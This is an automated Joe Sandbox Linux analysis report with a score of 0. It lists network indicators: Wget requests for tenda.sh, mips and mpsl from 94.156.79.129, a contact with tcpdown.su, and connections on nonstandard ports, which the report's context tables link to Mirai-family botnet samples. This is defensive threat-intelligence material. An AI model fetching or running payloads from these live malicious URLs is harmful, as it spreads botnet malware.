Edit tour

Linux Analysis Report

Overview

General Information

Analysis ID:	1431797
Infos:
Errors No process behavior to analyse as no analysis process or sample was found

Detection

Score:	0
Range:	0 - 100
Whitelisted:	false

Signatures

Detected TCP or UDP traffic on non-standard ports

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431797
Start date and time:	2024-04-25 19:35:44 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxcmdlinecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Detection:	UNKNOWN
Classification:	unknown0.lin@0/0@7/0

Errors

No process behavior to analyse as no analysis process or sample was found

Warnings

Connection to analysis system has been lost, crash info: Unknown
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Yara Signatures

⊘No yara matches

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: global traffic	TCP traffic: 192.168.2.20:44188 -> 104.168.45.11:7722
Source: global traffic	TCP traffic: 192.168.2.20:52826 -> 198.12.124.76:21425

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.79.129

Source: global traffic	HTTP traffic detected: GET /tenda.sh HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 94.156.79.129Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 94.156.79.129Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mpsl HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 94.156.79.129Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: tcpdown.su@v
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

Source: classification engine

Classification label: unknown0.lin@0/0@7/0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
tcpdown.su	2%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		high
tcpdown.su	172.245.119.70	true	false	2%, Virustotal, Browse	unknown
tcpdown.su@v	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Reputation
http://94.156.79.129/mips	false	unknown
http://94.156.79.129/mpsl	false	unknown
http://94.156.79.129/tenda.sh	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.168.45.11	unknown	United States	36352	AS-COLOCROSSINGUS	false
198.12.124.76	unknown	United States	36352	AS-COLOCROSSINGUS	false
94.156.79.129	unknown	Bulgaria	43561	NET1-ASBG	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.168.45.11	x86_64.crdownload.0.dr	Get hash	malicious	Unknown	Browse
	jmhrc116WA.elf	Get hash	malicious	Unknown	Browse
	fMzYC0To1f.elf	Get hash	malicious	Unknown	Browse
	Kt28gy4sgm.elf	Get hash	malicious	Mirai	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	i686.elf	Get hash	malicious	Unknown	Browse
	i586.elf	Get hash	malicious	Unknown	Browse
	sh4.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
94.156.79.129	http://94.156.79.129/x86_64	Get hash	malicious	Unknown	Browse	94.156.79.129/x86_64
	http://94.156.79.129/i686	Get hash	malicious	Unknown	Browse	94.156.79.129/i686
	http://94.156.79.129/x86_64	Get hash	malicious	Unknown	Browse	94.156.79.129/x86_64
	http://94.156.79.129/tenda.sh	Get hash	malicious	Unknown	Browse	94.156.79.129/tenda.sh

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	0tfJECfbEP.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	wve8oHXj1h.elf	Get hash	malicious	Mirai, Okiru	Browse	162.213.35.24
	o4883TEQGB.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.25
	Y4pblBbDQc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.24
	WIen6fj9bO.elf	Get hash	malicious	Mirai, Okiru	Browse	162.213.35.24
	LmwJkVcLpC.elf	Get hash	malicious	Mirai, Okiru	Browse	162.213.35.24
	6fV4tfoJp2.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.24
	hz2ffABF7w.elf	Get hash	malicious	Mirai, Okiru	Browse	162.213.35.25
	fqEpqMWF6r.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.24
	D0dhEeGfv4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.25
tcpdown.su	x86_64.crdownload.0.dr	Get hash	malicious	Unknown	Browse	104.168.45.11
	jmhrc116WA.elf	Get hash	malicious	Unknown	Browse	172.245.119.70
	VtMI9Eirot.elf	Get hash	malicious	Unknown	Browse	172.245.119.70

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	PURCHASE ORDER LIST GREEN VALLY CORP PDF.bat	Get hash	malicious	GuLoader	Browse	23.95.60.77
	SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	Get hash	malicious	Remcos	Browse	192.210.214.26
	Enquiry 230424.bat	Get hash	malicious	Remcos, DBatLoader	Browse	23.95.235.29
	PO#0023298413.xls	Get hash	malicious	Unknown	Browse	107.173.4.2
	Ref_Order04.xls	Get hash	malicious	Unknown	Browse	198.12.81.139
	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	RICHIESTA-QUOTAZIONI.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	768.xla.xlsx	Get hash	malicious	Unknown	Browse	23.95.60.77
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	TcnD64eVFK.exe	Get hash	malicious	Remcos	Browse	107.175.229.143
AS-COLOCROSSINGUS	PURCHASE ORDER LIST GREEN VALLY CORP PDF.bat	Get hash	malicious	GuLoader	Browse	23.95.60.77
	SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	Get hash	malicious	Remcos	Browse	192.210.214.26
	Enquiry 230424.bat	Get hash	malicious	Remcos, DBatLoader	Browse	23.95.235.29
	PO#0023298413.xls	Get hash	malicious	Unknown	Browse	107.173.4.2
	Ref_Order04.xls	Get hash	malicious	Unknown	Browse	198.12.81.139
	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	RICHIESTA-QUOTAZIONI.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	768.xla.xlsx	Get hash	malicious	Unknown	Browse	23.95.60.77
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	TcnD64eVFK.exe	Get hash	malicious	Remcos	Browse	107.175.229.143

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 19:36:18.998982906 CEST	58170	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.230114937 CEST	80	58170	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.230220079 CEST	58170	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.230726957 CEST	58170	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.461388111 CEST	80	58170	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.461636066 CEST	80	58170	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.461652994 CEST	80	58170	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.461702108 CEST	58170	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.461703062 CEST	58170	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.479177952 CEST	58170	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.491554976 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.710200071 CEST	80	58170	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.710470915 CEST	58170	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.717772961 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.717870951 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.725193024 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.951466084 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952186108 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952229023 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952266932 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952296019 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952299118 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952339888 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952380896 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952419043 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952455997 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952496052 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952533960 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952572107 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952572107 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952572107 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952572107 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952572107 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952574968 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:19.952685118 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952692032 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:19.952692032 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.178863049 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.178888083 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.178900957 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.178915977 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.178932905 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.178961992 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.178977013 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179032087 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179039955 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179039955 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179039955 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179039955 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179045916 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179039955 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179039955 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179039955 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179078102 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179151058 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179166079 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179183006 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179212093 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179263115 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179279089 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179311991 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179373026 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179414988 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179451942 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.179508924 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179508924 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179508924 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179510117 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179510117 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179510117 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179529905 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179529905 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179529905 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179529905 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179529905 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179529905 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.179538965 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407396078 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407452106 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407491922 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407571077 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407572031 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407625914 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407669067 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407677889 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407677889 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407706976 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407746077 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407784939 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407820940 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407857895 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.407895088 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407895088 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407895088 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407895088 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407895088 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407895088 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.407989025 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408029079 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408054113 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408066034 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408124924 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408132076 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408132076 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408165932 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408168077 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408206940 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408210039 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408246040 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408246994 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408286095 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408291101 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408324003 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408324957 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408365965 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408370018 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408406019 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408406973 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408447981 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408484936 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408523083 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408529043 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408562899 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408566952 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408605099 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408655882 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408694983 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408701897 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408734083 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408736944 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408771992 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408776045 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408812046 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408843040 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408843040 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408849001 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408889055 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408926964 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.408927917 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408927917 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.408966064 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.409003973 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.409117937 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.409117937 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.409117937 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.409121990 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.409161091 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.409198046 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.409234047 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.409271955 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.409307957 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.409307957 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.409312010 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.410485029 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.634320021 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.634381056 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.634439945 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.634485006 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.634624958 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.634665966 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.634706020 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.634746075 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.634763002 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.634763002 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.634789944 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.635137081 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.635176897 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.635199070 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.635485888 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.643321991 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:20.869745970 CEST	80	58172	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:20.869798899 CEST	58172	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.013674021 CEST	44188	7722	192.168.2.20	104.168.45.11
Apr 25, 2024 19:36:21.016585112 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.165163040 CEST	7722	44188	104.168.45.11	192.168.2.20
Apr 25, 2024 19:36:21.249108076 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.249989033 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.253206015 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.485299110 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.485692978 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.485764980 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.485795975 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.485903978 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.485903978 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.485903978 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.485930920 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.485980988 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.486047983 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.486067057 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.486103058 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.486120939 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.486157894 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.486228943 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.486228943 CEST	58178	80	192.168.2.20	94.156.79.129
